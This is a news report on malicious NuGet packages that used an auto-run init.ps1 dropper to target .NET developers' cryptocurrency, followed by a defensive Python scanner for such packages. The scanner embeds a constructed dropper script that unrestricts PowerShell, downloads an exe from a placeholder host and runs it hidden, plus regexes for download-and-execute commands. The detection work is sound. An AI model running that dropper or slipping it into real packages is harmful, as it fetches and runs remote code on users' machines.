New reports claim that .NET developers are being attacked by malware designed to steal their cryptocurrency.
Cybersecurity researchers at JFrog recently discovered an active campaign in which malicious packages were uploaded to the NuGet repository for .NET developers to download and use.
Once activated, a package runs a bundled PowerShell dropper, init.ps1 (a script NuGet executes automatically from a package's tools folder when it is used in Visual Studio), which relaxes the endpoint's PowerShell execution policy to Unrestricted so that any further script can run.
Non-standard payloads
The researchers suggest that this behaviour alone was enough of a red flag to warrant removing the package: “Such behavior is extremely rare outside of malicious packages, especially given the ‘Unlimited’ Execution policy, which should trigger a red flag immediately.”
Still, if allowed to run unrestricted, the package downloads and executes a “completely custom executable payload” built for Windows, the researchers added. Analysts say this is also unusual, since attackers typically reuse open-source tooling to save time.
To build their legitimacy, the attackers did two things. First, they crafted their NuGet profiles to impersonate Microsoft developers working on the .NET NuGet package manager.
Secondly, they inflated the download counts of the malicious packages to implausibly high levels, giving the impression that the packages were legitimate and had been downloaded hundreds of thousands of times. The researchers note that some of those downloads may be real, but it is more likely that bots were used to inflate the numbers and lull developers into trusting the packages.
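The install-time hook described above is straightforward to check for locally. The script below is an added example, not JFrog's analysis code or anything from the campaign itself: it treats a .nupkg as the zip archive it is, pulls out the tools/ scripts that NuGet auto-runs inside Visual Studio, and flags the pattern the article describes (execution policy set to Unrestricted, a remote fetch, and a launch). The sample packages, the two init.ps1 bodies and the example.invalid URL are constructed for the demonstration.

```python
import glob
import io
import os
import re
import sys
import zipfile

# Scripts NuGet runs automatically from a package's tools/ folder when the
# package is used inside Visual Studio (Package Manager Console). init.ps1 runs
# each time a solution containing the package is opened; install.ps1 and
# uninstall.ps1 run on install/uninstall in packages.config projects.
AUTORUN_SCRIPTS = {"tools/init.ps1", "tools/install.ps1", "tools/uninstall.ps1"}

# Heuristic indicators of a download-and-execute dropper (case-insensitive).
INDICATORS = {
    "execution_policy_relaxed": re.compile(
        r"Set-ExecutionPolicy\s+(Unrestricted|Bypass)", re.I),
    "remote_download": re.compile(
        r"Invoke-WebRequest|\biwr\b|Start-BitsTransfer|DownloadFile|DownloadString",
        re.I),
    "execution": re.compile(
        r"Invoke-Expression|\biex\b|Start-Process|\.exe\b", re.I),
    "encoded_payload": re.compile(r"FromBase64String|-EncodedCommand", re.I),
}


def scan_nupkg(data: bytes) -> dict:
    """Map each autorun script in a .nupkg (a plain zip) to the sorted list of
    indicator names that matched its text. Scripts outside tools/ never run
    automatically and are ignored."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.lower() in AUTORUN_SCRIPTS:
                text = zf.read(name).decode("utf-8", errors="replace")
                results[name] = sorted(
                    k for k, rx in INDICATORS.items() if rx.search(text))
    return results


def verdict(results: dict) -> str:
    """'block' if any autorun script relaxes the execution policy or both fetches
    and executes something; 'review' if an autorun script exists at all (rare
    in legitimate packages); 'clean' otherwise."""
    for hits in results.values():
        if "execution_policy_relaxed" in hits or (
                "remote_download" in hits and "execution" in hits):
            return "block"
    return "review" if results else "clean"


def build_nupkg(init_ps1=None) -> bytes:
    """Constructed sample package: a minimal .nuspec, a placeholder assembly and
    an optional tools/init.ps1. Not a real package from the campaign."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Sample.nuspec", "<package><metadata><id>Sample</id>"
                    "<version>1.0.0</version></metadata></package>")
        zf.writestr("lib/net6.0/Sample.dll", b"MZ")  # placeholder bytes only
        if init_ps1 is not None:
            zf.writestr("tools/init.ps1", init_ps1)
    return buf.getvalue()


# Constructed dropper modelled on the behaviour the article describes: relax
# the policy, fetch an executable, run it. The URL is a placeholder.
DROPPER_PS1 = """\
Set-ExecutionPolicy Unrestricted -Scope CurrentUser -Force
$out = Join-Path $env:TEMP 'update.exe'
Invoke-WebRequest -Uri 'https://example.invalid/update.exe' -OutFile $out
Start-Process -FilePath $out -WindowStyle Hidden
"""

# Constructed benign init.ps1 of the kind tooling packages ship: it only
# imports a module that lives inside the package itself.
BENIGN_PS1 = """\
param($installPath, $toolsPath, $package, $project)
Import-Module (Join-Path $toolsPath 'Sample.psm1')
"""


def scan_files(patterns) -> dict:
    """Scan .nupkg files on disk (e.g. the global packages folder
    ~/.nuget/packages/**/*.nupkg) and return {path: verdict}."""
    out = {}
    for pattern in patterns:
        for path in glob.glob(os.path.expanduser(pattern), recursive=True):
            with open(path, "rb") as fh:
                out[path] = verdict(scan_nupkg(fh.read()))
    return out


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, v in scan_files(sys.argv[1:]).items():
            print(f"{v:6}  {path}")
    else:
        for label, script in (("dropper", DROPPER_PS1), ("benign", BENIGN_PS1),
                              ("no-script", None)):
            res = scan_nupkg(build_nupkg(script))
            print(f"{label:10} {verdict(res):6} {res}")
```

Run it with a glob such as `~/.nuget/packages/**/*.nupkg` to sweep the global packages folder. Two caveats: init.ps1 only runs inside Visual Studio's Package Manager Console, so `dotnet restore` on a build server will not trigger it but a developer opening the solution will; and the regexes are a first-pass heuristic, so a script that only trips `encoded_payload`, or one that is otherwise obfuscated, still needs a manual read.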
“The top three packages were downloaded an incredible number of times – this may indicate that the attack was very successful, infecting a large number of machines,” JFrog security researchers said. “However, this is not a fully reliable indicator of attack success because the attackers may have automatically inflated the number of downloads (using bots) to make the packages look more legitimate.”
Via: BleepingComputer